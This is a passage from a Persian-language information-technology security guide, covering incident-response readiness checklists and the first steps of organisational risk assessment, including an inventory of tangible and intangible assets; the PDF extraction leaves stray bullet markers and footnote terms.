ﺍﺳﺘﺤﻜﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﻥ ﻧﻈﺮﺍﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺷﺮﻛﺖ ﺍﺑﺮﺍﺯ ﻛﻨﻨﺪ ﻛﻪ ﺑﺎﻋـﺚ
ﺟﻮﺳﺎﺯﻱ ﻣﺜﺒﺖ ﻳﺎ ﻣﻨﻔﻲ ﺷﻮﺩ.
62
o
o
o
o
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻳﺎﻥ؛
ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺣﻤﻠﻪ؛
ﺍﻋﻼﻡ ﺣﻤﻠﻪ ﺑﻪ ﻣﺪﻳﺮﺕ ﺍﺭﺷﺪ؛
ﺛﺒﺖ ﻭﻗﺎﻳﻊ؛
٦٤
ﺗﻬﻴﺔ ﺗﺼﺎﻭﻳﺮ ﺁﻧﻲ ﺍﺯ ﺳﻴﺴﺘﻢ؛
ﺗﻤﺎﺱ ﺑﺎ ﺗﻴﻢ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ
ﺭﺍﻳﺎﻧﻪﺍﻱ٦٥؛
ﺷﻨﺎﺳﺎﻳﻲ ﻣﻬﺎﺟﻢ؛
ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓﺮﺍﺩ ﻣﺴﺌﻮﻝ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ؛ ﻭ
ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﻪ ﻭﻱ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺮﺩ.
ﺍﮔﺮ ﺣﺎﺩﺛﻪﺍﻱ ﺭﺥ ﺩﻫﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺭﺍ
ﻣﺠﺪﺩﹰﺍ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ ﻭ ﺗﺎ ﺁﻧﺠﺎ ﻛﻪ ﺑﻮﺩﺟﻪ ﻭ ﺗـﺪﺍﺭﻛﺎﺕ ﺑـﻪ ﺷـﻤﺎ
ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺗﻘﻮﻳـﺖ ﻧﻤﺎﻳﻴـﺪ .ﺩﺭ ﺍﺭﺯﻳـﺎﺑﻲ ﺳـﺎﺯﻣﺎﻥ،
ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺳﺆﺍﻻﺕ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺷـﻤﺎ ﺩﺭ
ﺗﻌﺮﻳﻒ ﻧﻘﺎﻁ ﺿﻌﻒ ﻭ ﻗﻮﺕ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ ﻛﻤـﻚ ﻛﻨﻨـﺪ .ﻳـﻚ
ﻓﻬﺮﺳﺖ ﻧﻤﻮﻧﻪ ﻛﻪ ﺑﺮ ﺗﻮﺍﻧﺎﻳﻲ ﻭﺍﻛﻨﺶ ﻣـﺆﺛﺮ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺗﻬـﺎﺟﻢ
ﺗﻤﺮﻛﺰ ﺩﺍﺭﺩ ﺭﺍ ﺩﺭ ﺍﺩﺍﻣﻪ ﻣﻲﺑﻴﻨﻴﺪ:
ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺭﺧﺪﺍﺩ ،ﻃﺮﺣﻬﺎﻱ ﺗـﺮﻣﻴﻢ ﻭ ﺳـﺮﻣﺎﻳﺔ
ﻣﻮﺭﺩ ﻧﻴﺎﺯ:
o
o
o
o
ﺁﻳﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﭘﺎﺳـﺨﮕﻮﻳﻲ ﺑـﻪ ﺭﺧـﺪﺍﺩ ﻭﺟـﻮﺩ
ﺩﺍﺭﻧﺪ؟
ﺁﻳﺎ ﺭﻭﺍﻟﻬﺎ ﻗﺎﺑﻞ ﻓﻬﻢ ﻭ ﺑﻪ ﺭﻭﺯ ﻫﺴﺘﻨﺪ؟
ﺁﻳﺎ ﻃﺮﺣﻬﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺁﺛﺎﺭ ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ
ﺗﻬﻴﻪ ﺷﺪﻩﺍﻧﺪ؟
ﺁﻳﺎ ﺳﺮﻣﺎﻳﺔ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺑﺮﻭﺯ ﻭﺍﻛﻨﺸﻬﺎﻱ ﻣﻨﺎﺳﺐ ﺩﺭ
ﻣﻘﺎﺑﻞ ﺭﺧﺪﺍﺩ ﺗﺨﺼﻴﺺ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ؟
ﺭﻭﺍﻟﻬﺎﻱ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺘﻲ ﻭ ﻣﺪﻳﺮﻳﺖ:
oﺁﻳﺎ ﺭﻭﺍﻟﻬﺎ ﺷﺎﻣﻞ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺗﻤـﺎﺱ ﺑـﺎ
ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺗﻤﺎﻡ ﻃﻮﻝ ﺷـﺒﺎﻧﻪﺭﻭﺯ ﻭ ﻫـﺮ
ﻫﻔﺖ ﺭﻭﺯ ﻫﻔﺘﻪ ﻫﺴﺘﻨﺪ؟
oﺍﮔﺮ ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﺎﺷﺪ ،ﺁﻳﺎ ﺭﺍﻫﻲ
ﺑﺮﺍﻱ ﻣﻄﻠﻊ ﻛﺮﺩﻥ ﻣﺪﻳﺮﻳﺖ ﺍﺯ ﻣﺸﻜﻞ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
Snapshots
Computer Security Incident Response Team
64
65
١٤١
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
oﺁﻳﺎ ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﻣﻄﻠﻊ ﻛﺮﺩﻥ ﻣﺪﻳﺮ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ
)ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ( ﺍﺯ ﻭﻗﻮﻉ ﺣﻮﺍﺩﺙ ﺍﺣﺘﻤـﺎﻟﻲ ﺗﻌﺮﻳـﻒ
ﺷﺪﻩ ﺍﺳﺖ؟
oﺁﻳﺎ ﺭﻭﺍﻟﻲ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﺯﻣﺎﻥ ﺗﻤﺎﺱ ﺑﺎ ﺍﻓﺮﺍﺩ ﺧﺎﺭﺟﻲ
ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤـﻚ ﻭ ﻓـﺮﺩﻱ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﻳـﻦ
ﺗﻤﺎﺱ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
ﺭﻭﺍﻟﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ:
o
o
o
ﺭﻭﺍﻟﻬﺎﻱ ﻣﻨﺎﺑﻊ ﻓﻨﻲ:
o
o
o
o
o
o
o
ﺁﻳﺎ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻛﺮﺩﻥ ﻳﺎ ﭘﺎﻳـﺎﻥ ﺩﺍﺩﻥ ﺑـﻪ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟
ﺁﻳﺎ ﺩﺳﺘﻮﺭﺍﺕ ﺁﻏﺎﺯ ﻳﺎ ﭘﺎﻳﺎﻥ ﻃﺮﺡ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ
ﺑﺮﺭﺳﻲ ﻣﻲﺷﻮﻧﺪ؟
ﺁﻳﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﻛـﺸﻒ ﺗﻬـﺎﺟﻢ ﺭﻭﻱ
ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﻭ ﻓﻌﺎﻝ ﺷﺪﻩﺍﻧﺪ؟
ﺁﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻨﺎﺳﺎﻳﻲ ٦٦ﻛﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﺪﻩ
ﻣﻲﺗﻮﺍﻧﺪ ﺣﻤﻼﺕ ﻧﺎﺷﻨﺎﺧﺘﻪ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ؟
ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺎﺧﺘﺎﺭ ﻻﻳﻪﺑﻨـﺪﻱﺷـﺪﻩ
ﺣﻤﻼﺗﻲ ﻛﻪ ﺑـﻪ ﺷـﺒﻜﻪ ﻣـﻲﺷـﻮﻧﺪ ﺭﺍ ﻛـﺸﻒ ﻭ ﺍﺯ
ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﻴﺪ؟
ﺁﻳــﺎ ﺭﻭﻱ ﺷــﺒﻜﻪ ﻣــﻲﺗــﻮﺍﻥ ﺣﻤــﻼﺕ ﺭﺍ ﺑــﺴﺎﺩﮔﻲ
ﺗﻌﻘﻴﺐ ﻛﺮﺩ؟
ﻲ ﺍﻣﻨﻴــﺖ ،ﻛﻠﻴــﺔ
ﻱ ﺭﺳــﻤ ﹺ
ﺁﻳــﺎ ﺑــﺮ ﺍﺳــﺎﺱ ﻣﻤﻴــﺰ ﹺ
ﺳﻴﺴﺘﻤﻬﺎ ﺩﺍﺭﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻣﻨﻴﺘﻲ ﻛﺎﻓﻲ ﻫﺴﺘﻨﺪ؟
Detection Software
66
ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺍﻳﻦ
ﺳﺌﻮﺍﻻﺕ ﺍﺳﺎﺳﻲ ﺍﺳﺖ:
.۱ﺳﻌﻲ ﺩﺭ ﺣﻔﻆ ﭼﻪ ﭼﻴﺰﻱ ﺩﺍﺭﻡ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﭼﻘـﺪﺭ ﺑـﺮﺍﻱ
ﻣﻦ ﺍﺭﺯﺵ ﺩﺍﺭﺩ؟
.۲ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﻧﻴﺎﺯ ﺑﻪ ﺣﻔﺎﻇﺖ ﺩﺍﺭﻡ؟
.۳ﺣﺎﺿــﺮﻡ ﭼﻘــﺪﺭ ﺯﻣــﺎﻥ ،ﺗــﻼﺵ ﻭ ﺳــﺮﻣﺎﻳﻪ ﺑــﺮﺍﻱ ﺗــﺄﻣﻴﻦ
ﺣﻔﺎﻇﺖ ﻣﻨﺎﺳﺐ ﺍﺧﺘﺼﺎﺹ ﺩﻫﻢ؟
٦٧
ﺱ ﻓﺮﺁﻳﻨـﺪﻱ ﺑـﻪ ﻧـﺎﻡ ﺍﺭﺯﻳـﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ ﺭﺍ
ﺍﻳﻦ ﺳﺆﺍﻻﺕ ،ﺍﺳﺎ ﹺ
ﺷﻜﻞ ﻣﻲﺩﻫﻨﺪ .ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺑﺨﺶ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨـﺪ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ .ﺍﮔﺮ ﺷﻤﺎ ﻧﺪﺍﻧﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﭼﻪ ﻭ ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻪ
ﭼﻴﺰﻱ ﺣﻔﺎﻇﺖ ﺭﺍ ﺍﻋﻤﺎﻝ ﻣﻲﻛﻨﻴﺪ ،ﻧﺨﻮﺍﻫﻴﺪ ﺗﻮﺍﻧـﺴﺖ ﮔﺎﻣﻬـﺎﻱ
ﺁﻧﺮﺍ ﺗـﺪﻭﻳﻦ ﻧﻤﺎﻳﻴـﺪ .ﻭﻗﺘـﻲ ﺧﻄـﺮﺍﺕ ﺭﺍ ﺷـﻨﺎﺧﺘﻴﺪ ،ﻣـﻲﺗﻮﺍﻧﻴـﺪ
ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻓﻨﻮﻧﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺟﺮﺍﻱ ﻃﺮﺣﻬﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﻩ
ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺭﺍ ﻃﺮﺍﺣﻲ ﻛﻨﻴﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔـﺮ ﺧﻄـﺮ ﻗﻄـﻊ ﺑـﺮﻕ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻬﻢ ﺍﺳﺖ ،ﺑﺎﻳﺪ ﺍﻳﻦ ﺧﻄﺮ ﺭﺍ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ٦٨UPSﻛﺎﻫﺶ ﺩﻫﻴﺪ.
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﺷﺎﻣﻞ ﺳﻪ ﻣﺮﺣﻠﺔ ﻛﻠﻴﺪﻱ ﺍﺳﺖ:
.۱
.۲
.۳
ﺷﻨﺎﺳﺎﻳﻲ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﺍﺭﺯﺵ ﺁﻧﻬﺎ
ﺷﻨﺎﺳﺎﻳﻲ ﺗﻬﺪﻳﺪﺍﺕ
ﻣﺤﺎﺳﺒﺔ ﻣﺨﺎﻃﺮﺍﺕ
ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﻳـﻚ
ﺭﻭﺵ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﺑـﺴﻴﺎﺭ ﻣﻮﻓـﻖ ﺑـﻮﺩﻩ ،ﺍﻳﺠـﺎﺩ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ
ﻲ ﺩﺭﻭﻥﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ .ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﺷـﻤﺎ
ﻛﺎﺭﮔﺎﻫﻬﺎﻱ ﺁﻣﻮﺯﺷ ﹺ
ﺑﺎﻳــﺪ ﺍﺯ ﻛــﺎﺭﺑﺮﺍﻥ ﺁﮔــﺎﻩ ﺑﺨــﺸﻬﺎﻱ ﻣﺨﺘﻠــﻒ ،ﻣــﺪﻳﺮﺍﻥ ﻣﻴــﺎﻧﻲ ﻭ
ﻣﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳـﻲ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺩﻋـﻮﺕ ﺑﻌﻤـﻞ ﺁﻭﺭﻳـﺪ؛ ﻭ ﻃـﻲ
ﺟﻠﺴﺎﺗﻲ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﺗﻬﻴـﻪ ﻧﻤﺎﻳﻴـﺪ .ﺍﻳـﻦ
ﻓﺮﺁﻳﻨﺪ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﺘﺮﻱ ﺗﻬﻴﻪ
ﻛﻨﻴﺪ ،ﺑﻠﻜﻪ ﺁﮔﺎﻫﻲ ﺣﻀﺎﺭ ﺍﺯ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﻴﺰ ﺑﺎﻻﺗﺮ ﻣﻲﺑﺮﺩ.
ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺁﻣﺎﺭﻱ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﺑﺨﻮﺍﻫـﺪ
ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺧﺎﻧﮕﻲ ﻳﺎ ﻳﻚ ﺷـﺮﻛﺖ ﺑـﺴﻴﺎﺭ ﻛﻮﭼـﻚ
ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ .ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ
ﻣﻄﺮﺡ ﻣﻲﺷﻮﻧﺪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ ،ﺳﺎﺯﻣﺎﻧﻬﺎﻱ
Risk Assessment
Uninterruptible Power Supply
67
68
ﺑﺨﺶ ﺳﻮﻡ
o
ﺁﻳﺎ ﻫﻤﺔ ﻛﺎﺭﻛﻨﺎﻥ ﻛﻠﻴﺪﻱ ﺑﺮﺍﻱ ﺑﻜﺎﺭ ﺑﺴﺘﻦ ﺭﻭﺍﻟﻬـﺎ
ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ؟
ﺁﻳــﺎ ﻛﺎﺭﻛﻨــﺎﻥ ﻛﻠﻴــﺪﻱ ﻭﺍﻗﻌ ـﹰﺎ ﺩﺭ ﻫﻤــﺔ ﺟﻠــﺴﺎﺕ
ﺁﻣﻮﺯﺷﻲ ﺣﻀﻮﺭ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ؟
ﺁﻳــﺎ ﺩﻟﻴــﻞ ﺍﻧﺘﺨــﺎﺏ ﻛﺎﺭﻛﻨــﺎﻥ ﻛﻠﻴــﺪﻱ ،ﺳــﻮﺍﺑﻖ
ﺩﺭﺧﺸﺎﻥ ﺁﻧﻬﺎ ﺑﻮﺩﻩ ﺍﺳﺖ؟
ﺁﻳﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﺭﻭﺍﻥ ﺍﺳﺖ؟
ﻣﺮﺍﺣﻞ ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ
١٤٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﻭﻟﺘﻲ ،ﻭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﻣﻬﻢ ﻛﺎﻓﻲ ﻧﻴﺴﺘﻨﺪ .ﺩﺭ ﭼﻨـﻴﻦ ﻣـﻮﺍﺭﺩﻱ،
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﻣـﺸﺎﻭﺭﻩﺍﻱ ﻛـﻪ ﻣﺘﺨـﺼﺺ
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻫﺴﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧـﺮﻡ-
ﻲ ﺍﺭﺯﻳﺎﺑﻲ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ.
ﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺨﺼﺼ ﹺ
ﺷﻨﺎﺳﺎﻳﻲ ﺩﺍﺭﺍﺋﻴﻬﺎ
ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺍﻗﻼﻣﻲ ﻛﻪ ﺑﻪ ﺣﻔﺎﻇﺖ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ .ﺍﻳـﻦ
ﻓﻬﺮﺳﺖ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﻃﺮﺡ ﻛـﺴﺐ ﻭ ﻛـﺎﺭ ٦٩ﻭ ﺩﺍﻧـﺶ ﻋﺮﻓـﻲ
ﺷــﻤﺎ ﺗﻨﻈــﻴﻢ ﺷــﻮﺩ .ﺍﻳــﻦ ﻓﺮﺁﻳﻨــﺪ ﻧﻴﺎﺯﻣﻨــﺪ ﺁﮔــﺎﻫﻲ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ
ﻛﺎﺭﺑﺮﺩﻱ ،ﺩﺭﻙ ﻛﺎﻣﻞ ﺗﺴﻬﻴﻼﺕ ،ﻭ ﻋﻠـﻢ ﺑـﻪ ﮔـﺴﺘﺮﺓ ﭘﻮﺷـﺶ
ﺑﻴﻤﺔ ﺷﻤﺎ ﺍﺳﺖ .ﺍﻗﻼﻡ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻠﻤـﻮﺱ )ﻣﺜـﻞ
ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ ،ﺻﻔﺤﺎﺕ ﻧﻤﺎﻳﺶ ،ﻛﺎﺑﻠﻬﺎﻱ ﺷﺒﻜﻪ ،ﺗﺠﻬﻴﺰﺍﺕ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ،
ﻭ ﻛﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ( ﻭ ﻳﺎ ﻏﻴﺮﻣﻠﻤﻮﺱ )ﻣﺜﻞ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ،ﺭﻣـﺰ
ﻋﺒﻮﺭ ﺍﺻﻠﻲ ،ﺗﻮﺍﻧﺎﻳﻲ ﺍﺩﺍﻣﺔ ﭘﺮﺩﺍﺯﺵ ،ﻓﻬﺮﺳﺖ ﻣـﺸﺘﺮﻳﺎﻥ ،ﻭﺟﻬـﺔ ﻋﻤـﻮﻣﻲ ،ﻭ
ﺍﻋﺘﺒﺎﺭ ﺩﺭ ﺻﻨﻌﺖ( ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺑﺎﻳﺪ ﻫﺮ ﭼﻴـﺰﻱ ﻛـﻪ ﺑـﺮﺍﻱ
ﺷﻤﺎ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳﺖ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ .ﺑـﺮﺍﻱ ﺗـﺸﺨﻴﺺ ﺍﺭﺯﺷـﻤﻨﺪ
ﺑﻮﺩﻥ ﻫﺮ ﻣﻮﺭﺩ ،ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﺨﺮﻳﺐ ﻳﺎ ﻓﻘـﺪﺍﻥ
ﺁﻥ ،ﭼﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺯﻣﺎﻧﻲ ﻭ ﭘﻮﻟﻲ ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮ ﻳﺎ ﺟـﺎﻳﮕﺰﻳﻨﻲ ﺁﻥ
ﺑﻪ ﺷﻤﺎ ﺗﺤﻤﻴﻞ ﻣﻲﺷﻮﺩ .ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻳﻜﻪ ﺑﻄﻮﺭ ﺣﺘﻢ ﺑﺎﻳـﺪ ﺩﺭ
ﻓﻬﺮﺳﺖ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻤﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﻣﻮﺍﺭﺩ ﻣﻠﻤﻮﺱ:
o
o
o
o
o
o
o
o
o
ﺭﺍﻳﺎﻧﻪﻫﺎ؛
ﺩﺍﺩﻩﻫﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ؛
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﺑﺎﻳﮕﺎﻧﻲ؛
ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ،ﺭﺍﻫﻨﻤﺎﻫﺎ ﻭ ﻛﺘﺎﺑﻬﺎ؛
ﻧﺴﺨﻪﻫﺎﻱ ﭼﺎﭘﻲ؛
ﻭﺳﺎﻳﻞ ﺗﻮﺯﻳﻊ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ؛
ﻭﺳﺎﻳﻞ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﻛﺎﺑﻞﻛﺸﻲﻫﺎ؛
ﺳﻮﺍﺑﻖ ﻛﺎﺭﻛﻨﺎﻥ؛ ﻭ
ﺍﺳﻨﺎﺩ ﺣﺴﺎﺑﺮﺳﻲﺷﺪﻩ.
oﺣﺴﻦ ﻧﻴﺖ ﻣﺸﺘﺮﻳﺎﻥ؛
ﻥ ﭘﺮﺩﺍﺯﺵ؛ ﻭ
oﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩ
oﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﻴﻜﺮﺑﻨﺪﻱ.
ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺠﺎﻱ ﺗﻮﺟﻪ ﺻﺮﻑ ﺑﻪ ﺟﻨﺒﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ،ﻧﮕﺮﺷـﻲ
ﻭﺳﻴﻌﺘﺮ ﺑﻪ ﺍﻗﻼﻡ ﻓﻮﻕ ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﻣﺮﺑﻮﻃﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ .ﺍﮔـﺮ
ﺷﻤﺎ ﻧﮕﺮﺍﻥ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻴﺪ ﻛﻪ ﻛﺴﻲ ﺑﺘﻮﺍﻧﺪ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺎﻟﻲ
ﺷﻤﺎ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﺪ ،ﺷﻴﻮﺓ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﻓﺮﺩ ﺑﻪ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ
)ﭼﻪ ﺍﺯ ﻃﺮﻳﻖ ﻧﺴﺨﻪﻫﺎﻱ ﻛﺎﻏﺬﻱ ﭼﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﭼـﻪ ﺍﺯ
ﻃﺮﻳﻖ ﺩﺳﺘﺮﺳﻲ ﻣﺴﺘﻘﻴﻢ ﺑﻪ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ( ﺍﺯ ﺍﻫﻤﻴـﺖ ﺧﺎﺻـﻲ
